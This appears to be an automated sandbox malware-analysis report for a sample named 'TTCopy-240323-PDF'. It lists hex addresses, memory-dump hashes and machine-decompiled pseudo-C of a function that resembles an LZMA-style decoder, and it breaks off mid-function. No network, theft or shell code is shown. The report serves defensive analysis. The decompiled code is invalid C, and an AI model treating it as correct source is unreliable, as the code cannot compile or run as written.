                                                                                            0x00406eac
                                                                                            0x00000000
                                                                                            0x00406eac
                                                                                            0x00000000
                                                                                            0x00406eb1
                                                                                            0x00406eb1
                                                                                            0x00406eb5
                                                                                            0x00407575
                                                                                            0x00000000
                                                                                            0x00407575
                                                                                            0x00406ebb
                                                                                            0x00406ebe
                                                                                            0x00406ec1
                                                                                            0x00406ec5
                                                                                            0x00406ec8
                                                                                            0x00406ece
                                                                                            0x00406ed0
                                                                                            0x00406ed0
                                                                                            0x00406ed0
                                                                                            0x00406ed3
                                                                                            0x00406ed6
                                                                                            0x00406ed6
                                                                                            0x00406ed6
                                                                                            0x00406edc
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406ede
                                                                                            0x00406ee1
                                                                                            0x00406ee4
                                                                                            0x00406ee7
                                                                                            0x00406eea
                                                                                            0x00406eed
                                                                                            0x00406ef0
                                                                                            0x00406ef3
                                                                                            0x00406ef6
                                                                                            0x00406ef9
                                                                                            0x00406efc
                                                                                            0x00406f14
                                                                                            0x00406f17
                                                                                            0x00406f1a
                                                                                            0x00406f1d
                                                                                            0x00406f1d
                                                                                            0x00406f20
                                                                                            0x00406f24
                                                                                            0x00406f26
                                                                                            0x00406efe
                                                                                            0x00406efe
                                                                                            0x00406f06
                                                                                            0x00406f0b
                                                                                            0x00406f0d
                                                                                            0x00406f0f
                                                                                            0x00406f0f
                                                                                            0x00406f29
                                                                                            0x00406f30
                                                                                            0x00406f33
                                                                                            0x00000000
                                                                                            0x00406f35
                                                                                            0x00000000
                                                                                            0x00406f35
                                                                                            0x00406f33
                                                                                            0x00406f3a
                                                                                            0x00406f3a
                                                                                            0x00406f3a
                                                                                            0x00406f3a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406f75
                                                                                            0x00406f75
                                                                                            0x00406f79
                                                                                            0x00407581
                                                                                            0x00000000
                                                                                            0x00407581
                                                                                            0x00406f7f
                                                                                            0x00406f82
                                                                                            0x00406f85
                                                                                            0x00406f89
                                                                                            0x00406f8c
                                                                                            0x00406f92
                                                                                            0x00406f94
                                                                                            0x00406f94
                                                                                            0x00406f94
                                                                                            0x00406f97
                                                                                            0x00406f9a
                                                                                            0x00406f9a
                                                                                            0x00406fa0
                                                                                            0x00406f3e
                                                                                            0x00406f3e
                                                                                            0x00406f41
                                                                                            0x00000000
                                                                                            0x00406f41
                                                                                            0x00406fa2
                                                                                            0x00406fa2
                                                                                            0x00406fa5
                                                                                            0x00406fa8
                                                                                            0x00406fab
                                                                                            0x00406fae
                                                                                            0x00406fb1
                                                                                            0x00406fb4
                                                                                            0x00406fb7
                                                                                            0x00406fba
                                                                                            0x00406fbd
                                                                                            0x00406fc0
                                                                                            0x00406fd8
                                                                                            0x00406fdb
                                                                                            0x00406fde
                                                                                            0x00406fe1
                                                                                            0x00406fe1
                                                                                            0x00406fe4
                                                                                            0x00406fe8
                                                                                            0x00406fea
                                                                                            0x00406fc2
                                                                                            0x00406fc2
                                                                                            0x00406fca
                                                                                            0x00406fcf
                                                                                            0x00406fd1
                                                                                            0x00406fd3
                                                                                            0x00406fd3
                                                                                            0x00406fed
                                                                                            0x00406ff4
                                                                                            0x00406ff7
                                                                                            0x00000000
                                                                                            0x00406ff9
                                                                                            0x00000000
                                                                                            0x00406ff9
                                                                                            0x00000000
                                                                                            0x00407286
                                                                                            0x00407286
                                                                                            0x0040728a
                                                                                            0x004075b1
                                                                                            0x00000000
                                                                                            0x004075b1
                                                                                            0x00407290
                                                                                            0x00407293
                                                                                            0x00407296
                                                                                            0x0040729a
                                                                                            0x0040729d
                                                                                            0x004072a3
                                                                                            0x004072a5
                                                                                            0x004072a5
                                                                                            0x004072a5
                                                                                            0x004072a8
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407395
                                                                                            0x00407399
                                                                                            0x004073bb
                                                                                            0x004073be
                                                                                            0x004073c8
                                                                                            0x004073cb
                                                                                            0x004073cb
                                                                                            0x004073cb
                                                                                            0x00000000
                                                                                            0x004073cb
                                                                                            0x004073cb
                                                                                            0x0040739b
                                                                                            0x0040739e
                                                                                            0x004073a2
                                                                                            0x004073a5
                                                                                            0x004073a5
                                                                                            0x004073a8
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407452
                                                                                            0x00407456
                                                                                            0x00407474
                                                                                            0x00407474
                                                                                            0x00407474
                                                                                            0x0040747b
                                                                                            0x00407482
                                                                                            0x00407489
                                                                                            0x00407489
                                                                                            0x00000000
                                                                                            0x00407489
                                                                                            0x00407458
                                                                                            0x0040745b
                                                                                            0x0040745e
                                                                                            0x00407461
                                                                                            0x00407468
                                                                                            0x004073ac
                                                                                            0x004073ac
                                                                                            0x004073af
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407543
                                                                                            0x00407546
                                                                                            0x00407447
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040717d
                                                                                            0x0040717f
                                                                                            0x00407186
                                                                                            0x00407187
                                                                                            0x00407189
                                                                                            0x0040718c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407194
                                                                                            0x00407197
                                                                                            0x0040719a
                                                                                            0x0040719c
                                                                                            0x0040719e
                                                                                            0x0040719e
                                                                                            0x0040719f
                                                                                            0x004071a2
                                                                                            0x004071a9
                                                                                            0x004071ac
                                                                                            0x004071ba
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407490
                                                                                            0x00407490
                                                                                            0x00407493
                                                                                            0x0040749a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040749f
                                                                                            0x0040749f
                                                                                            0x004074a3
                                                                                            0x004075db
                                                                                            0x00000000
                                                                                            0x004075db
                                                                                            0x004074a9
                                                                                            0x004074ac
                                                                                            0x004074af
                                                                                            0x004074b3
                                                                                            0x004074b6
                                                                                            0x004074bc
                                                                                            0x004074be
                                                                                            0x004074be
                                                                                            0x004074be
                                                                                            0x004074c1
                                                                                            0x004074c4
                                                                                            0x004074c4
                                                                                            0x004074c4
                                                                                            0x004074c4
                                                                                            0x004074c7
                                                                                            0x004074c7
                                                                                            0x004074cb
                                                                                            0x0040752b
                                                                                            0x0040752e
                                                                                            0x00407533
                                                                                            0x00407534
                                                                                            0x00407536
                                                                                            0x00407538
                                                                                            0x0040753b
                                                                                            0x00407447
                                                                                            0x00407447
                                                                                            0x00000000
                                                                                            0x0040744d
                                                                                            0x00407447
                                                                                            0x004074cd
                                                                                            0x004074d3
                                                                                            0x004074d6
                                                                                            0x004074d9
                                                                                            0x004074dc
                                                                                            0x004074df
                                                                                            0x004074e2
                                                                                            0x004074e5
                                                                                            0x004074e8
                                                                                            0x004074eb
                                                                                            0x004074ee
                                                                                            0x00407507
                                                                                            0x0040750a
                                                                                            0x0040750d
                                                                                            0x00407510
                                                                                            0x00407514
                                                                                            0x00407516
                                                                                            0x00407516
                                                                                            0x00407517
                                                                                            0x0040751a
                                                                                            0x004074f0
                                                                                            0x004074f0
                                                                                            0x004074f8
                                                                                            0x004074fd
                                                                                            0x004074ff
                                                                                            0x00407502
                                                                                            0x00407502
                                                                                            0x0040751d
                                                                                            0x00407524
                                                                                            0x00000000
                                                                                            0x00407526
                                                                                            0x00000000
                                                                                            0x00407526
                                                                                            0x00000000
                                                                                            0x004071c2
                                                                                            0x004071c5
                                                                                            0x004071fb
                                                                                            0x0040732b
                                                                                            0x0040732b
                                                                                            0x0040732b
                                                                                            0x0040732b
                                                                                            0x0040732e
                                                                                            0x0040732e
                                                                                            0x00407331
                                                                                            0x00407333
                                                                                            0x004075bd
                                                                                            0x00000000
                                                                                            0x004075bd
                                                                                            0x00407339
                                                                                            0x0040733c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407342
                                                                                            0x00407346
                                                                                            0x00407349
                                                                                            0x00407349
                                                                                            0x00407349
                                                                                            0x00000000
                                                                                            0x00407349
                                                                                            0x004071c7
                                                                                            0x004071c9
                                                                                            0x004071cb
                                                                                            0x004071cd
                                                                                            0x004071d0
                                                                                            0x004071d1
                                                                                            0x004071d3
                                                                                            0x004071d5
                                                                                            0x004071d8
                                                                                            0x004071db
                                                                                            0x004071f1
                                                                                            0x004071f6
                                                                                            0x0040722e
                                                                                            0x0040722e
                                                                                            0x00407232
                                                                                            0x0040725e
                                                                                            0x00407260
                                                                                            0x00407267
                                                                                            0x0040726a
                                                                                            0x0040726d
                                                                                            0x0040726d
                                                                                            0x00407272
                                                                                            0x00407272
                                                                                            0x00407274
                                                                                            0x00407277
                                                                                            0x0040727e
                                                                                            0x00407281
                                                                                            0x004072ae
                                                                                            0x004072ae
                                                                                            0x004072b1
                                                                                            0x004072b4
                                                                                            0x00407328
                                                                                            0x00407328
                                                                                            0x00407328
                                                                                            0x00000000
                                                                                            0x00407328
                                                                                            0x004072b6
                                                                                            0x004072bc
                                                                                            0x004072bf
                                                                                            0x004072c2
                                                                                            0x004072c5
                                                                                            0x004072c8
                                                                                            0x004072cb
                                                                                            0x004072ce
                                                                                            0x004072d1
                                                                                            0x004072d4
                                                                                            0x004072d7
                                                                                            0x004072f0
                                                                                            0x004072f2
                                                                                            0x004072f5
                                                                                            0x004072f6
                                                                                            0x004072f9
                                                                                            0x004072fb
                                                                                            0x004072fe
                                                                                            0x00407300
                                                                                            0x00407302
                                                                                            0x00407305
                                                                                            0x00407307
                                                                                            0x0040730a
                                                                                            0x0040730e
                                                                                            0x00407310
                                                                                            0x00407310
                                                                                            0x00407311
                                                                                            0x00407314
                                                                                            0x00407317
                                                                                            0x004072d9
                                                                                            0x004072d9
                                                                                            0x004072e1
                                                                                            0x004072e6
                                                                                            0x004072e8
                                                                                            0x004072eb
                                                                                            0x004072eb
                                                                                            0x0040731a
                                                                                            0x00407321
                                                                                            0x004072ab
                                                                                            0x004072ab
                                                                                            0x004072ab
                                                                                            0x004072ab
                                                                                            0x00000000
                                                                                            0x00407323
                                                                                            0x00000000
                                                                                            0x00407323
                                                                                            0x00407321
                                                                                            0x00407234
                                                                                            0x00407237
                                                                                            0x00407239
                                                                                            0x0040723c
                                                                                            0x0040723f
                                                                                            0x00407242
                                                                                            0x00407244
                                                                                            0x00407247
                                                                                            0x0040724a
                                                                                            0x0040724a
                                                                                            0x0040724d
                                                                                            0x0040724d
                                                                                            0x00407250
                                                                                            0x00407257
                                                                                            0x0040722b
                                                                                            0x0040722b
                                                                                            0x0040722b
                                                                                            0x0040722b
                                                                                            0x00000000
                                                                                            0x00407259
                                                                                            0x00000000
                                                                                            0x00407259
                                                                                            0x00407257
                                                                                            0x004071dd
                                                                                            0x004071e0
                                                                                            0x004071e2
                                                                                            0x004071e5
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406f44
                                                                                            0x00406f44
                                                                                            0x00406f48
                                                                                            0x0040758d
                                                                                            0x00000000
                                                                                            0x0040758d
                                                                                            0x00406f4e
                                                                                            0x00406f51
                                                                                            0x00406f54
                                                                                            0x00406f57
                                                                                            0x00406f5a
                                                                                            0x00406f5d
                                                                                            0x00406f60
                                                                                            0x00406f62
                                                                                            0x00406f65
                                                                                            0x00406f68
                                                                                            0x00406f6b
                                                                                            0x00406f6d
                                                                                            0x00406f6d
                                                                                            0x00406f6d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004070cf
                                                                                            0x004070cf
                                                                                            0x004070d3
                                                                                            0x00407599
                                                                                            0x00000000
                                                                                            0x00407599
                                                                                            0x004070d9
                                                                                            0x004070dc
                                                                                            0x004070df
                                                                                            0x004070e2
                                                                                            0x004070e4
                                                                                            0x004070e4
                                                                                            0x004070e4
                                                                                            0x004070e7
                                                                                            0x004070ea
                                                                                            0x004070ed
                                                                                            0x004070f0
                                                                                            0x004070f3
                                                                                            0x004070f6
                                                                                            0x004070f7
                                                                                            0x004070f9
                                                                                            0x004070f9
                                                                                            0x004070f9
                                                                                            0x004070fc
                                                                                            0x004070ff
                                                                                            0x00407102
                                                                                            0x00407105
                                                                                            0x00407105
                                                                                            0x00407105
                                                                                            0x00407108
                                                                                            0x0040710a
                                                                                            0x0040710a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040734c
                                                                                            0x0040734c
                                                                                            0x0040734c
                                                                                            0x00407350
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407356
                                                                                            0x00407359
                                                                                            0x0040735c
                                                                                            0x0040735f
                                                                                            0x00407361
                                                                                            0x00407361
                                                                                            0x00407361
                                                                                            0x00407364
                                                                                            0x00407367
                                                                                            0x0040736a
                                                                                            0x0040736d
                                                                                            0x00407370
                                                                                            0x00407373
                                                                                            0x00407374
                                                                                            0x00407376
                                                                                            0x00407376
                                                                                            0x00407376
                                                                                            0x00407379
                                                                                            0x0040737c
                                                                                            0x0040737f
                                                                                            0x00407382
                                                                                            0x00407385
                                                                                            0x00407389
                                                                                            0x0040738b
                                                                                            0x0040738e
                                                                                            0x00000000
                                                                                            0x00407390
                                                                                            0x0040710d
                                                                                            0x0040710d
                                                                                            0x00000000
                                                                                            0x0040710d
                                                                                            0x0040738e
                                                                                            0x004075c3
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406bf2
                                                                                            0x004075fa
                                                                                            0x004075fa
                                                                                            0x00000000
                                                                                            0x004075fa
                                                                                            0x00407447
                                                                                            0x004073ce
                                                                                            0x004073cb
                                                                                            0x00000000
                                                                                            0x00407120

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.269472376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.269465559.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269481310.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269527274.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_TTCopy-240323-PDF.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                                                                            • Instruction ID: aecab3f40db1f9fc07a3dc9ea3777efa7aa3d7dc23f88bc09ddd959c6243594a
                                                                                            • Opcode Fuzzy Hash: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                                                                            • Instruction Fuzzy Hash: 2B711571D04228DBEF28CF98C8547ADBBB1FF44305F14806AD856BB281D778A986DF05
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00407068 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 98%
                                                                                            			E00407068() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
